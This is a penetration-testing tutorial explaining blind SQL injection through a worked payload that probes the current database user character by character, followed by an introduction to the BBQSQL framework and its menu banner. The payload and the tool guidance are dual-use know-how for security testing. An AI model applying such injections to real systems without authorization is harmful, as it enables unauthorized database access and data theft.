Penetration Testing for Blind SQL Injection using BBQSQL

SQL (Structured Query Language) is a language for interaction with the database .  is a web application attack to inject malicious syntax in SQL Queries .

BLIND SQL INJECTION

Blind SQL  consists of techniques for exploiting the SQL injection vulnerabilities by performing a Binary search by putting one character at a time. Well this is very time consuming .
An Example of  is :
Blind SQL Injection Case:
UNAME = "' or (ASCII(SUBSTR(SELECT user(),1,1))>63) --";
PASS = "";
QUERY = "select * from users where pass=md5('"+PASS+"') and uname='"+UNAME+"'";

QUERY evaluates to:
select *
from users where pass=md5('')
and uname='' or (ASCII(SUBSTR(SELECT user(),1,1))>63) --'
select *
from users where pass=md5('') and
uname=''
or (
ASCII(                 << char -> int
SUBSTR(            << slice string
SELECT user()  << current user
,1,1)                       << first char
)>63                       << 63 = '?'
) --'                          << comment

Well we have a lot of tools that can be used for  for Blind SQL injection :
  • SQLMAP
  • SQLNINJA
  • BSQL Hacker
  • Mole
  • Havij …… etc …..
Though during penetration testing , if these tools dont work , mostly we end up writing a custom script . So here is a treat !! BBSQL can simplify tricky blind SQL injection attack .

Blind SQL Injection with BBQSQL

BBSQL can be used to exploit the Blind SQL injection and can help to reach for hidden vulnerabilities .
BBSQL is fast , simple , versatile and extensible .
BBQSQL is a blind SQL injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool, allowing quite a bit of customization for those hard to trigger SQL injection findings.
The tool is built to be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up attacks much easier. Python gevent is also implemented, making BBQSQL extremely fast.
Similar to other SQL injection tools you provide certain request information.
Must provide the usual information:
  • URL
  • HTTP Method
  • Headers
  • Cookies
  • Encoding methods
  • Redirect behavior
  • Files
  • HTTP Auth
  • Proxies
Here is a Usage guide for the Tool :

root@kali:~# bbqsql
    _______   _______    ______    ______    ______   __      
   |       \ |       \  /      \  /      \  /      \ |  \      
   | $$$$$$$\| $$$$$$$\|  $$$$$$\|  $$$$$$\|  $$$$$$\| $$      
   | $$__/ $$| $$__/ $$| $$  | $$| $$___\$$| $$  | $$| $$      
   | $$    $$| $$    $$| $$  | $$ \$$    \ | $$  | $$| $$      
   | $$$$$$$\| $$$$$$$\| $$ _| $$ _\$$$$$$\| $$ _| $$| $$      
   | $$__/ $$| $$__/ $$| $$/ \ $$|  \__| $$| $$/ \ $$| $$_____
   | $$    $$| $$    $$ \$$ $$ $$ \$$    $$ \$$ $$ $$| $$     \
    \$$$$$$$  \$$$$$$$   \$$$$$$\  \$$$$$$   \$$$$$$\ \$$$$$$$$
                     \$$$                \$$$

                   _.(-)._
                .'         '.
               / 'or '1'='1  \
               |'-...___...-'|
                \    '='    /
                 `'._____.'`
                  /   |   \
                 /.--'|'--.\
              []/'-.__|__.-'\[]
                      |
                     []

    BBQSQL injection toolkit (bbqsql)        
    Lead Development: Ben Toews(mastahyeti)        
    Development: Scott Behrens(arbit)        
    Menu modified from code for Social Engineering Toolkit (SET) by: David Kennedy (ReL1K)    
    SET is located at: http://www.secmaniac.com(SET)    
    Version: 1.0              
   
    The 5 S's of BBQ:
    Sauce, Spice, Smoke, Sizzle, and SQLi
   


 Select from the menu:

   1) Setup HTTP Parameters
   2) Setup BBQSQL Options
   3) Export Config
   4) Import Config
   5) Run Exploit
   6) Help, Credits, and About

  99) Exit the bbqsql injection toolkit

bbqsql>

Happy hunting !!! Blind SQL is now simple and Fast .
# This tools is really Fast . Try it !! comes built in  !!
#For educational purpose only , Penetration testing without permission is legal offence . The Author holds no responsibility if you misuse this tutorial .